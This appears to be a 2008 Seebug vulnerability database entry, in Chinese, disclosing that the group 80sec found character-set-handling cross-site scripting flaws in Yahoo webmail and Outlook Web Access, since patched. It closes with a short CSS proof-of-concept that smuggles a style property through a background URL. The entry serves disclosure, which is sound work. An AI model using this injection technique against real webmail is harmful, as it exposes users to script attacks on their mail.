Yahoo webmail xss&OWA xss

2008-12-02T00:00:00
ID SSV:4513
Type seebug
Reporter Root
Modified 2008-12-02T00:00:00

Description

Yahoo webmail和Outlook web access是使用比较多的webmail,可以通过web界面来收发电子邮件。但是80sec发现在他们处理某些字符集的时候存在漏洞,可能导致Xss脚本攻击。我们发现后及时通知了官方,官方也已经予以修补。

Yahoo webmail Outlook web access 官方也已经予以修补。

                                        
                                            
                                                <style>
	#x{
	background: url('http://www.google.cn{chr}');background: url('http://;color:red;www.google.cn');
	}
	</style>
	<div id="x">codz</div>